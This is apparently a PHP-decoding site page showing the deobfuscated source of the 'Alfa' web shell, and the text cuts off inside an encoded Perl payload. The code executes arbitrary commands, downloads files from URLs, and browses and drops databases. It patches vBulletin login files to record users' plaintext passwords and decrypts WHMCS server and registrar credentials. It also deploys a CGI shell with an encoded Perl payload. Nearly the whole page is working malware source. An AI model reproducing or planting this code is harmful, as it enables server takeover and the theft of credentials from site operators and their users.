Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Mhqc0; tGJSi: function alfaterminalExec() { $pwd = "\160\167\x64"; $seperator..

Decoded Output download

<?php 
 goto Mhqc0; tGJSi: function alfaterminalExec() { $pwd = "pwd"; $seperator = ";"; if ($GLOBALS["sys"] != "unix") { $pwd = "cd"; $seperator = "&"; } if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) { $cmd = "cd '" . addslashes($_POST["c"]) . "'" . $seperator; } $current_path = ''; if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}" . $seperator . "|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST["alfa1"], $match)) { if (empty($match[1])) { $match[1] = $match[2]; } $current_path = alfaEx("cd " . addslashes($match[1]) . $seperator . $pwd); $current_path = str_replace("\", "/", $current_path); } $out = alfaEx($cmd . $_POST["alfa1"], true); $out = htmlspecialchars($out); echo json_encode(array("output" => convertBash($out), "path" => $current_path)); } goto ldnR5; sPVEQ: function alfaremotedl() { alfahead(); echo "<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>\xa<form onsubmit="g('remotedl',null,this.d.value,this.p.value,'>>');return false;">
<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>\xa<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='" . $GLOBALS["cwd"] . "'><p><input type='submit' value=' '></p>
</form></p></center>"; if (isset($_POST["alfa1"], $_POST["alfa2"], $_POST["alfa3"]) && !empty($_POST["alfa1"]) && $_POST["alfa3"] == ">>") { echo __pre(); $url = $_POST["alfa1"]; $path = $_POST["alfa2"]; echo "<center>"; if (__download($url, $path)) { echo "<font color="green">Success...!</font>"; } else { echo "<font color="red">Error...!</font>"; } echo "</center>"; } echo "</div>"; alfafooter(); } goto jPDeP; h5ZJ7: function alfaopen_archive_dir() { $dir = $_POST["alfa1"]; $base_id = $_POST["alfa2"]; __alfa_open_archive_file($dir, $base_id); } goto P95rf; rvAhm: $GLOBALS["home_cwd"] = @alfaGetCwd(); goto uIAcf; GzfHC: function alfasql() { class DbClass { public $type; public $link; public $res; public $mysqli_connect_error = false; public $mysqli_connect_error_msg = ''; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } else { $this->mysqli_connect_error = true; $this->mysqli_connect_error_msg = mysqli_connect_error(); return false; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error($this->link); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysqli_set_charset($this->link, $str); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table solevisible"); return array("file" => implode("
", $r)); break; } return false; } } $db = new DbClass($_POST["type"]); alfahead(); $form_visibility = "table"; if (isset($_POST["sql_host"])) { $connection_db = $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); if ($connection_db && !empty($_POST["sql_base"])) { $form_visibility = "none"; } } $database_list = array(); echo "
<div class='header' style='min-height:300px;'>" . ($form_visibility != "none" ? "<center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml("all") . "</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>" : '') . "\xa<div class='sf' class='db-opt-id'><table style='margin: 0 auto;" . ($form_visibility == "none" ? "display:none;" : '') . "' cellpadding='2' cellspacing='0'><tr>
<td><div class="txtfont">TYPE</div></td><td><div class="txtfont">HOST</div></td><td><div class="txtfont">DB USER</div></td><td><div class="txtfont">DB PASS</div></td><td><div class="txtfont">DB NAME</div></td><td></td></tr><tr>\xa<td><select name='type'><option value='mysql' selected>mysql</option></select></td>
<td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . "'></td>
<td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST["sql_login"]) ? '' : htmlspecialchars($_POST["sql_login"])) . "'></td>
<td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "'></td><td>"; $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST["sql_base"]) ? '' : htmlspecialchars($_POST["sql_base"])) . "'>"; if (isset($_POST["sql_host"])) { if ($connection_db) { $db->setCharset("utf8"); $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while ($item = $db->fetch()) { list($key, $value) = each($item); $database_list[] = $value; echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select>"; } else { echo $tmp; } } else { echo $tmp; } $curr_mysql_id = $_POST["current_mysql_id"]; echo "</td>
<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>\xa<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> <div class="txtfont">count the number of rows</div></td>
</tr>
</table>"; if ($db->mysqli_connect_error) { echo "<div style="text-align: center;font-size: 17px;margin-top: 18px;">" . $db->mysqli_connect_error_msg . "</div>"; } if (!empty($curr_mysql_id)) { $sql_title_db = ''; if (!empty($_POST["sql_base"])) { $sql_title_db = "d.querySelector('#tab_" . $curr_mysql_id . " span').innerHTML='" . addslashes($_POST["sql_base"]) . "';"; } echo "<script>mysql_cache['" . $curr_mysql_id . "']['host']='" . addslashes($_POST["sql_host"]) . "';mysql_cache['" . $curr_mysql_id . "']['user']='" . addslashes($_POST["sql_login"]) . "';mysql_cache['" . $curr_mysql_id . "']['pass']='" . addslashes($_POST["sql_pass"]) . "';mysql_cache['" . $curr_mysql_id . "']['db']='" . addslashes($_POST["sql_base"]) . "';mysql_cache['" . $curr_mysql_id . "']['charset']='" . addslashes($_POST["charset"]) . "';mysql_cache['" . $curr_mysql_id . "']['type']='" . addslashes($_POST["type"]) . "';mysql_cache['" . $curr_mysql_id . "']['count']='" . addslashes($_POST["sql_count"]) . "';" . $sql_title_db . "alfaConnectionHistoryUpdate();</script>"; } if (isset($db) && $db->link) { if (!empty($_POST["sql_base"])) { echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'>&#x3C;&#x3C;</div><div class='mysql-tables'><div><input placeholder="Filter Table" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='" . (empty($_POST["sql_count"]) ? "false" : "true") . "' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>"; foreach ($database_list as $db_name) { echo "<li><div class="block"><i></i><b></b><a sql_count="" . (empty($_POST["sql_count"]) ? "false" : "true") . "" db_target="" . $db_name . "" onclick="alfaMysqlExpander(this);" class="expander cls-" . $db_name . "-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/" . ($db_name == $_POST["sql_base"] ? "b_minus.png" : "b_plus.png") . "" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">" . $db_name . "</span><div class="clearfloat"></div><div db_name="" . $db_name . "" mode="" . ($db_name == $_POST["sql_base"] ? "loaded" : "no") . "" class="list_container cls-" . $db_name . ""><div>"; if ($db_name == $_POST["sql_base"]) { $db->selectdb($_POST["sql_base"]); $tbls_res = $db->listTables(); echo "<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-" . $db_name . "" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>"; while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM `" . $value . "`")); } $value = htmlspecialchars($value); echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a class='db-opt-id' db_target='" . $db_name . "' href='javascript:void(0);' onclick="alfaLoadTableData(this,'" . $value . "')"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n["n"]})</span></small>") . "</div></li>"; } echo "</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-" . $db_name . "" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-" . $db_name . "" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="" . $db_name . "" target=".cls-" . $db_name . "" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>"; } echo "</div></li>"; } echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='" . $_POST["sql_base"] . "' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>"; } echo "</table></div>"; echo "</div>"; } else { echo htmlspecialchars($db->error()); } echo "</div>"; alfafooter(); } goto W3QA9; CQ4Ti: function alfacheckfiletype() { $path = $_POST["path"]; $arg = $_POST["arg"]; if (@is_file($path . "/" . $arg)) { echo "file"; } else { echo "dir"; } } goto Gw1Wi; UCtms: function alfacmshijacker() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "<div class=header><br>
<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g('cmshijacker',null,this.cmshi.value,this.saveto.value,'>>',this.cmspath.value);return false;" method='post'>\xa<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">"; $cm_array = array("vb" => "vBulletin", "wp" => "wordpress", "jom" => "joomla", "whmcs" => "whmcs", "mybb" => "mybb", "ipb" => "ipboard", "phpbb" => "phpbb"); foreach ($cm_array as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select>"; echo " Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="" . $GLOBALS["cwd"] . "alfa.txt"></font>\xa<input type="submit" name="btn" value=" "></form></center><br>"; $cms = $_POST["alfa1"]; $saveto = $_POST["alfa2"]; $cmspath = $_POST["alfa4"]; if (!empty($cms) and !empty($saveto) and $_POST["alfa4"] and $_POST["alfa3"] == ">>") { echo __pre(); alfaHijackCms($cms, $cmspath, $saveto); } echo "</div>"; alfafooter(); } goto Gg7XK; IJ5CO: if (!function_exists("json_encode")) { function json_encode($a = false) { if (is_null($a)) { return "null"; } if ($a === false) { return "false"; } if ($a === true) { return "true"; } if (is_scalar($a)) { if (is_float($a)) { return floatval(str_replace(",", ".", strval($a))); } if (is_string($a)) { static $jsonReplaces = array(array("\", "/", "\xa", "\x9", "\xd", "\b", "", """), array("\\", "\/", "\n", "\t", "\r", "\b", "\f", "\"")); return """ . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . """; } else { return $a; } } $isList = true; for ($i = 0, reset($a); $i < count($a); $i++, next($a)) { if (key($a) !== $i) { $isList = false; break; } } $result = array(); if ($isList) { foreach ($a as $v) { $result[] = json_encode($v); } return "[" . join(",", $result) . "]"; } else { foreach ($a as $k => $v) { $result[] = json_encode($k) . ":" . json_encode($v); } return "{" . join(",", $result) . "}"; } } } goto BQm_p; jL3tA: if (!function_exists("sys_get_temp_dir")) { function sys_get_temp_dir() { foreach (array("TMP", "TEMP", "TMPDIR") as $env_var) { if ($temp = getenv($env_var)) { return $temp; } } $temp = tempnam($GLOBALS["__file_path"], ''); if (_alfa_file_exists($temp, false)) { unlink($temp); return dirname($temp); } return null; } } goto dptXn; qa1jm: function alfasearcher() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g('searcher',null,'file')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g('searcher',null,'str')">| Find Files By Name | </a></h3></center>"; if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "file") { echo "<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g('searcher',null,'file',this.filename.value,this.ext.value,this.method.value,'>>');return false;" method='post'>\xa<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="" . $GLOBALS["cwd"] . "">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>"; $dir = $_POST["alfa2"]; $ext = $_POST["alfa3"]; $method = $_POST["alfa4"]; if ($_POST["alfa5"] == ">>") { echo __pre(); if (substr($dir, -1) == "/") { $dir = substr($dir, 0, -1); } Alfa_Searcher($dir, trim($ext), $method); } } if ($_POST["alfa1"] == "str") { echo "<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g('searcher',null,'str',this.dir.value,this.string.value,'>>',this.ext.value,this.method.value);return false;" method='post'>\xa<div class="txtfont">\xaMethod: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">\xaDir: <input size="50" type="text" name="dir" value="" . $GLOBALS["cwd"] . "">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>"; $dir = $_POST["alfa2"]; $string = $_POST["alfa3"]; $ext = $_POST["alfa5"]; if (!empty($string) and !empty($dir) and $_POST["alfa4"] == ">>") { echo __pre(); Alfa_StrSearcher($dir, $string, $ext, $_POST["alfa6"]); } } echo "</div>"; alfafooter(); } goto K8RV4; rihre: function alfaPermsColor($f, $isbash = false) { $class = ''; $num = ''; $human = ''; if ($isbash) { $class = $f["class"]; $num = $f["num"]; $human = $f["human"]; } else { $num = substr(sprintf("%o", @fileperms($f)), -4); $human = alfaPerms(@fileperms($f)); if (!@is_readable($f)) { $class = "main_red_perm"; } elseif (!@is_writable($f)) { $class = "main_white_perm"; } else { $class = "main_green_perm"; } } return "<span style="font-weight:unset;" class="" . $class . "">" . $num . "</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="" . $class . "">" . $human . "</span>"; } goto DIhO_; q3RIR: function _alfa_file($file, $cgi = true) { $array = @file($file); if (!$array) { if (strlen(alfaEx("id", false, $cgi)) > 0) { $data = alfaEx("cat "" . addslashes($file) . """, false, $cgi); if (strlen($data) > 0) { return explode("\xa", $data); } else { return false; } } else { return false; } } else { return $array; } } goto IGhSm; hVRBs: function output($string) { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>"; } goto Hq5LP; K84I1: function hijackvBulletin($path, $saveto) { $code = "$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`='" . $alfa_username . "'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . ' : ' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}"; $clearpw = "defined('DISABLE_PASSWORD_CLEARING')"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/login.php"; $class = $path . "/includes/class_bootstrap.php"; $dologin = "do_login_redirect();"; $evil_login = "\x9" . $code . "\xa\x9" . $dologin; $evil_class = "true"; if ((@is_file($login) and @is_writable($login)) || (@is_file($class) and @is_writable($class))) { $data_login = @file_get_contents($login); $data_class = @file_get_contents($class); if (strstr($data_login, $dologin) || strstr($data_class, $clearpw)) { $login_replace = str_replace($dologin, $evil_login, $data_login); $class_replace = str_replace($clearpw, $evil_class, $data_class); @file_put_contents($login, $login_replace); @file_put_contents($class, $class_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L1kU5; xyjRH: function __ZGVjb2Rlcg($s) { return zRtSHsbTzV($s); } goto K5MFn; JSX0M: function alfaWhmcs() { alfahead(); echo "<div class=header>"; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists("sha1")) { $hash = sha1($string); } else { $hash = md5($string); } $out = ''; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8, 9, 10); echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml("whmcs") . "</p><form onsubmit="g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;">
<input type='hidden' name='form_action' value='2'>"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "cc_encryption_hash : ", "inputName" => "cc_encryption_hash", "id" => "cc_encryption_hash", "inputValue" => '', "inputSize" => "50")); create_table($table); echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>"; if ($_POST["alfa5"] != '') { $db_host = $_POST["alfa7"]; $db_username = $_POST["alfa3"]; $db_password = $_POST["alfa4"]; $db_name = $_POST["alfa5"]; $cc_encryption_hash = $_POST["alfa6"]; echo __pre(); $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn)); $query = mysqli_query($conn, "SELECT * FROM tblservers"); $num = mysqli_num_rows($query); if ($num > 0) { for ($i = 0; $i <= $num - 1; $i++) { $v = @mysqli_fetch_array($query); $ipaddress = $v["ipaddress"]; $username = $v["username"]; $type = $v["type"]; $active = $v["active"]; $hostname = $v["hostname"]; echo "<center><table border='1'>"; $password = decrypt($v["password"], $cc_encryption_hash); echo "<tr><td><b><font color="#FFFFFF">Type</font></td><td>{$type}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Active</font></td><td>{$active}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Hostname</font></td><td>{$hostname}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Ip</font></td><td>{$ipaddress}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Username</font></td><td>{$username}</td></tr></b>"; echo "<tr><td><b><font color="#FFFFFF">Password</font></td><td>{$password}</td></tr></b>"; echo "</table><br><br></center>"; } $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0) { for ($i = 0; $i <= $num1 - 1; $i++) { $v = mysqli_fetch_array($query1); $registrar = $v["registrar"]; $setting = $v["setting"]; $value = decrypt($v["value"], $cc_encryption_hash); if ($value == '') { $value = 0; } echo "<center>Domain Reseller <br><center>"; echo "<center><table border='1'>"; echo "<tr><td><b><font color="#67ABDF">Register</font></td><td>{$registrar}</td></tr></b>"; echo "<tr><td><b><font color="#67ABDF">Setting</font></td><td>{$setting}</td></tr></b>"; echo "<tr><td><b><font color="#67ABDF">Value</font></td><td>{$value}</td></tr></b>"; echo "</table><br><br></center>"; } } } else { __alert("<font color="red">tblservers is Empty...!</font>"); } } echo "</div>"; alfafooter(); } goto Qj51n; PRamH: $config = array("AlfaUser" => $GLOBALS["DB_NAME"]["user"], "AlfaPass" => $GLOBALS["DB_NAME"]["pass"], "AlfaProtectShell" => $GLOBALS["DB_NAME"]["safemode"], "AlfaLoginPage" => $GLOBALS["DB_NAME"]["login_page"]); goto F8Vk4; JM3pb: if (!function_exists("mb_substr")) { function mb_substr($str, $start, $end, $c = '') { return substr($str, $start, $end); } } goto xbej7; NkkuH: function alfadlfile() { if (isset($_POST["c"], $_POST["file"])) { $basename = rawurldecode(basename($_POST["file"])); $_POST["file"] = str_replace("//", "/", $_POST["c"] . "/" . $basename); $alfa_canruncmd = _alfa_can_runCommand(true, true); if (@is_file($_POST["file"]) && @is_readable($_POST["file"]) || $alfa_canruncmd) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename="" . addslashes($basename) . """); header("Content-Type: application/octet-stream"); if ($GLOBALS["glob_chdir_false"]) { $randname = $basename . rand(111, 9999); $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]); $filepath = $scriptpath . "/" . $randname; if (_alfa_is_writable($scriptpath)) { alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'"); readfile($filepath); @unlink($filepath); } else { alfaEx("cat '" . addslashes($_POST["file"]) . "'"); } } else { readfile($_POST["file"]); } } else { echo "Error...!"; } } } goto oMz56; GF8GE: define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : ''); goto n0FgV; bthgC: function alfacgishell() { alfahead(); $div = ''; alfaCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __ALFA_DATA_FOLDER__); if (!in_array($_POST["alfa1"], array("perl", "py"))) { $div = "</div>"; echo "<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a class="rejectme" href="javascript:void(0)" onclick="runcgi('perl')">| Perl | </a><a class="rejectme" href="javascript:void(0)" onclick="runcgi('py');">| Python | </a>"; } if (isset($_POST["alfa1"]) && in_array($_POST["alfa1"], array("perl", "py"))) { @mkdir("cgialfa", 493); @chdir("cgialfa"); alfacgihtaccess("cgi"); $name = $_POST["alfa1"] . ".alfa"; $perl = "#!/usr/bin/perl   -I/usr/local/bandmin" . "
" . "use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/6UZDXfTRvKvLBthSRBbtktazrJcQuJA3iUhlxju9aJgZGlt70OWVH2QpMb97Tezu7KkEKC0yUORZud7ZmdmlyJj5PT4dDwYvPQy9vMzuwDAEQ+ZBETeignQwU1AdG+WTRMvX+q25i/4NOApcQg8EcsoFw2ta5q29l8enU1guWtrZ5ODVXDJEviiLWprbyN+W0FsgBzEq5UXBRO+YnGRHxapl/M4gtUekF8u45vDO5DB/TdFnhQ5wm0NtBKC4WvB8jBe8Ih8/ozvyU3BA0MbmvhNvXDuoYhSoKFU+5VUig1ITSlTIJ+DwXVk6gcU8GhyE1DAOAdL7/OjritQLES4YOAY5udx2sQh/VGrR3qjVl/g4ltPwIAoK2bkgnnBuZeCy9dh7HshMZ7wyAQeL6aEz+FpK7DGd4kG7/D8yO7g+ckLQe5pEeY88dL8KE5Xh17uAak2Pnu31g/enE3GZ5Pp5Lfzsb4hzp/EWpXIrjUH9HYA+DaZxUUUeOmdY3Semppl87khOVyM//N2fDmZno4nr98cAg/2O6GvxhNqrjUebQUB0sVv08vJxfHZK31jb1iYfZvF+ZtL5JGC6cbl5PD4DKzh0e49vU/GZ68mr/WNaW+27P6uTaDwSwUBtfV2W+9oPftFyDPMriwJeW5YWxRL6APOfQ0asvRlHCCVhthXvesmGDRwUzfCf5/hT2SVy0jxwdZKYr18/ZNkgkKzAJVHa30Ouw+VRnuIQKpYAHdcxrx3XIq2uLQkk/i92pdgTS1rcR+WIQy8A0nk9G1licav4ZU/fQrOKQES/33nqZAoVKwvAXfDvVFKQBYqBSATlYniDVkY742GW0zzswBo8KWZQsUt7mOj0zGtxPM/GtSnu2TJbg2tZ5rWgglDUJKwFSjsDaYXW78Q+acC1yoDBiYyz1/CBzG6pNMh2g6AMVkr49ynFgHxRm0XVZwcyQmxd0nfVEZ+V8kfNKUDZdDtUtzfRsDmPGJQvspVLKZ1TGX1BovF2ySMvQDL9dpfxomhTbwUCuAZBMsU3GoAdNhBkaYsyg95aqJ+K+vKdV3rGva4Nkm9KJuzFJmJtUfG1XvrvetePzG1R3adESqh6h/uGrWEhJf8D5TDo9yAJF1gM2hmtEksqOn9ZyYWlThhkfH2/OTN/uHR8cl4l9BRTQw1zfWMR6s4YDUkYZaspnaSgiBSrZF7wmw/jLMGsSKhpbEsIPe1//fLjhtRhahPlowgQ0L1zkz1w4aXOzolN15GChEJ4JcVvs+ybF6E4V1Hl8mppB55qBr0mkfUlvE7xwUUrQIJ9YqsNSxbWJWGPsSKpaOhAMQRUKx47tB8ybOO/OgEPPNmwNXJ04LZYiXoQIYUzJnlsWcUEct8L2EGi3zw5NuLY+i1SRwBZ6OObUKaUQJI+V3CHLotolUNpWTF8mUcOLJcE8/HHu2AY7RLP+VJfgJ9CUHgktEw9GYsJEDsUOWaFKBZ4kWEA4vpdI6uLBIAWggdkWGWp3G0GLWiWZbY8nmwjCGCxBMxAESJMbQE99GQRzgNZPldCCqDJ5LQuxtEYByYglK2ksF5/tKLFogW+8UKrO9ABMchw9eXd8eB4epbnVzd7PAoYunryemJI7yE8rOr7nVHDESUSC8hlBJRGumckgzyx6E/7d